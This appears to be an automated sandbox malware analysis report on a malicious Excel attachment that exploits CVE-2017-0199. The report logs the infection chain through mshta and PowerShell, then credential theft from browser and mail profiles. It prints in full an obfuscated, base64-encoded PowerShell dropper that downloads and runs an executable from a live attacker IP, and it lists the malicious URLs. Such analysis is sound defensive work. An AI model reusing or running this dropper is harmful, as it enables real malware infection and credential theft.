            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ngxpd0hb\ngxpd0hb.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4348.tmp" "c:\Users\user\AppData\Local\Temp\ngxpd0hb\CSCA3EB236CC00F4C599499BBB2E0A3996.TMP"
            Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELL -eX BypASs -NoP -w 1 -c DevicecREdENtIalDepLoYMent.Exe ; ieX($(ieX('[syStEM.texT.encOdiNg]'+[ChaR]0x3A+[cHAr]0x3a+'UtF8.geTStriNG([SYsTEm.conVeRT]'+[Char]58+[CHAR]58+'FromBAse64STriNG('+[chaR]34+'JFltICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkRC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFckRlZmluSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbW9uLmRMbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpVcXgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWGV0dVN2RXMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVmVsLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBudEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTGtQZERQKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTUGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGNJbGFmR2lhYnZyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRZbTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjYvNzcwL2RsbGhvc3QuZXhlIiwiJEVOdjpBUFBEQVRBXGRsbGhvc3QuZXhlIiwwLDApO3NUQXJ0LXNsZUVwKDMpO1N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxkbGxob3N0LmV4ZSI='+[chAR]0X22+'))')))"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\dllhost.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES866F.tmp" "c:\Users\user\AppData\Local\Temp\tnesdt30\CSC4AC68FDA20F44DF3BBC22D1FFF1AFB9.TMP"
            Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\dllhost.exe"
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jflticagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefkrc10wvblicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfckrlzmlusxrjb24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmbw9ulmrmbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagifpvcxgsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagwgv0dvn2rxmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagvmvslhvpbnqgicagicagicagicagicagicagicagicagicagicagicbudeussw50uhryicagicagicagicagicagicagicagicagicagicagicagtgtqzerqktsnicagicagicagicagicagicagicagicagicagicagicaglw5hbwugicagicagicagicagicagicagicagicagicagicagicaitvaiicagicagicagicagicagicagicagicagicagicagicaglw5hbuvtugfdrsagicagicagicagicagicagicagicagicagicagicagignjbgfmr2lhynzyicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrzbto6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtizljyvnzcwl2rsbghvc3quzxhliiwijevodjpbufbeqvrbxgrsbghvc3quzxhliiwwldapo3nuqxj0lxnszuvwkdmpo1n0qvjuicagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxkbgxob3n0lmv4zsi='+[char]0x22+'))')))"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]58+'frombase64string('+[char]34+'jflticagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagiefkrc10wvblicagicagicagicagicagicagicagicagicagicagicaglu1ftwjfckrlzmlusxrjb24gicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivxjmbw9ulmrmbcisicagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagifpvcxgsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagwgv0dvn2rxmsc3ryaw5nicagicagicagicagicagicagicagicagicagicagicagvmvslhvpbnqgicagicagicagicagicagicagicagicagicagicagicbudeussw50uhryicagicagicagicagicagicagicagicagicagicagicagtgtqzerqktsnicagicagicagicagicagicagicagicagicagicagicaglw5hbwugicagicagicagicagicagicagicagicagicagicagicaitvaiicagicagicagicagicagicagicagicagicagicagicaglw5hbuvtugfdrsagicagicagicagicagicagicagicagicagicagicagignjbgfmr2lhynzyicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrzbto6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlze3mi4ynduumtizljyvnzcwl2rsbghvc3quzxhliiwijevodjpbufbeqvrbxgrsbghvc3quzxhliiwwldapo3nuqxj0lxnszuvwkdmpo1n0qvjuicagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxkbgxob3n0lmv4zsi='+[char]0x22+'))')))"
            Source: dllhost.exe, 0000000B.00000000.440804644.0000000000482000.00000002.00000001.01000000.0000000B.sdmp, dllhost.exe, 00000016.00000000.477390475.0000000000482000.00000002.00000001.01000000.0000000B.sdmp, dllhost.exe.7.dr, dllhost[1].exe.7.drBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara matchFile source: 0000000E.00000002.630259466.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.630259466.000000000270D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.630215962.000000000250D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.630215962.0000000002361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3108, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3176, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

            Remote Access Functionality

            Source: Yara matchFile source: 0000000E.00000002.630259466.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.630259466.000000000270D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.630215962.000000000250D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.630215962.0000000002361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.629152726.0000000000416000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3108, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3176, type: MEMORYSTR
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | 1 Scripting | Valid Accounts | 13 Exploitation for Client Execution | 1 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 13 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | 111 Command and Scripting Interpreter | 1 DLL Side-Loading | 212 Process Injection | 21 Obfuscated Files or Information | LSASS Memory | 114 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | 3 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 1 Install Root Certificate | Security Account Manager | 11 Security Software Discovery | SMB/Windows Admin Shares | 11 Email Collection | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 2 Process Discovery | Distributed Component Object Model | 1 Clipboard Data | 23 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 21 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 21 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 212 Process Injection | DCSync | 1 Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            [Figure: behavior graph. Behavior Graph ID: 1522511; Sample: SYSN ORDER.xls; Startdate: 30/09/2024; Architecture: WINDOWS; Score: 100. Process nodes: EXCEL.EXE, mshta.exe, cmd.exe, powershell.exe, dllhost.exe, csc.exe, cvtres.exe, RegSvcs.exe.]

Source | Detection | Scanner | Label | Link
SYSN ORDER.xls | 21% | ReversingLabs | Document-Excel.Exploit.CVE-2017-0199 |
SYSN ORDER.xls | 26% | Virustotal | | Browse
SYSN ORDER.xls | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\dllhost.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dllhost[1].exe | 100% | Joe Sandbox ML | |

No Antivirus matches

Source | Detection | Scanner | Label | Link
reallyfreegeoip.org | 0% | Virustotal | | Browse
checkip.dyndns.com | 0% | Virustotal | | Browse
checkip.dyndns.org | 0% | Virustotal | | Browse

Name | IP | Active | Malicious | Antivirus Detection | Reputation
og1.in | 172.67.216.244 | true | false | | unknown
reallyfreegeoip.org | 188.114.96.3 | true | true | | unknown
checkip.dyndns.com | 193.122.130.0 | true | false | | unknown
checkip.dyndns.org | unknown | unknown | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://og1.in/cIP5a8 | false | | unknown
http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta | true | | unknown
http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
https://reallyfreegeoip.org/xml/8.46.123.33 | false | URL Reputation: safe | unknown
http://172.245.123.6/770/dllhost.exe | true | | unknown
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.hta8Amshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://secure.comodo.com/CPS0mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C1B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      http://172.245.123.6/xampp/crio/IEnetbokkworkingforupdate.htaWmshta.exe, 00000004.00000002.420227515.000000000022A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000002.420401597.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.417457596.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.416448809.0000000003072000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415947263.000000000306D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.415965686.0000000003071000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.450490527.000000001C23C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.471498465.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000002.472492057.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.470945172.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000C.00000003.468426129.00000000037CC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.629441326.0000000000758000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000017.00000002.629356941.000000000062A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://172.245.123.6/770/dllhostpowershell.exe, 00000007.00000002.441192247.00000000028AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.478774316.0000000002839000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
132.226.8.169 | unknown | United States | 16989 | UTMEMUS | false
104.21.78.54 | unknown | United States | 13335 | CLOUDFLARENETUS | false
172.245.123.6 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
188.114.97.3 | unknown | European Union | 13335 | CLOUDFLARENETUS | false
193.122.6.168 | unknown | United States | 31898 | ORACLE-BMC-31898US | false
188.114.96.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true
193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
158.101.44.242 | unknown | United States | 31898 | ORACLE-BMC-31898US | false
172.67.216.244 | og1.in | United States | 13335 | CLOUDFLARENETUS | false
132.226.247.73 | unknown | United States | 16989 | UTMEMUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1522511
Start date and time: 2024-09-30 10:11:01 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 26s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 26
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SYSN ORDER.xls
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winXLS@27/30@46/10
EGA Information:
• Successful, ratio: 60%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 55
• Number of non-executed functions: 40
Cookbook Comments:
• Found application associated with file extension: .xls
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Active ActiveX Object
• Active ActiveX Object
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
• Execution Graph export aborted for target mshta.exe, PID 3624 because there are no executed function
• Execution Graph export aborted for target mshta.exe, PID 3996 because there are no executed function
• Not all processes where analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
04:12:18 | API Interceptor | 101x Sleep call for process: mshta.exe modified
04:12:22 | API Interceptor | 159x Sleep call for process: powershell.exe modified
04:12:43 | API Interceptor | 28671x Sleep call for process: RegSvcs.exe modified
                                                                                  • 172.67.216.244
                                                                                  PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • 104.21.78.54
                                                                                  PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                  • 172.67.216.244
                                                                                  RFQ-5120240930 VENETA PESCA SRL.vbsGet hashmaliciousVIP KeyloggerBrowse
                                                                                  • 188.114.97.3
                                                                                  https://form.asana.com/?k=SVzOAgf254NWBNm-dO6Wfg&d=1208255323046871Get hashmaliciousUnknownBrowse
                                                                                  • 1.1.1.1
                                                                                  SecuriteInfo.com.Win32.MalwareX-gen.31013.20843.dllGet hashmaliciousUnknownBrowse
                                                                                  • 188.114.97.3
                                                                                  SecuriteInfo.com.Win32.MalwareX-gen.31013.20843.dllGet hashmaliciousUnknownBrowse
                                                                                  • 188.114.97.3
                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                  • 172.67.74.152
                                                                                  AS-COLOCROSSINGUSPI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • 104.168.7.7
                                                                                  PI#0034250924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • 104.168.7.7
                                                                                  PO 11001 .xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                  • 107.173.4.16
                                                                                  ZIXBhdgf6y.exeGet hashmaliciousRemcosBrowse
                                                                                  • 192.3.101.137
                                                                                  http://jeevankiranfoundationcenter.co.in/css/rrp.htmGet hashmaliciousKutakiBrowse
                                                                                  • 23.94.221.14
                                                                                  C6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                                                                  • 104.168.32.148
                                                                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                                                                                  • 107.172.130.147
                                                                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtfGet hashmaliciousRemcosBrowse
                                                                                  • 192.3.101.29
                                                                                  PO.xlsGet hashmaliciousRemcosBrowse
                                                                                  • 104.168.32.148
                                                                                  GEsD6lobvy.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                                  • 172.245.123.6
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  05af1f5ca1b87cc9cc9b25185115607dC6DAEyTs7d.rtfGet hashmaliciousRemcosBrowse
                                                                                  • 188.114.96.3
                                                                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.26006.17204.rtfGet hashmaliciousRemcosBrowse
                                                                                  • 188.114.96.3
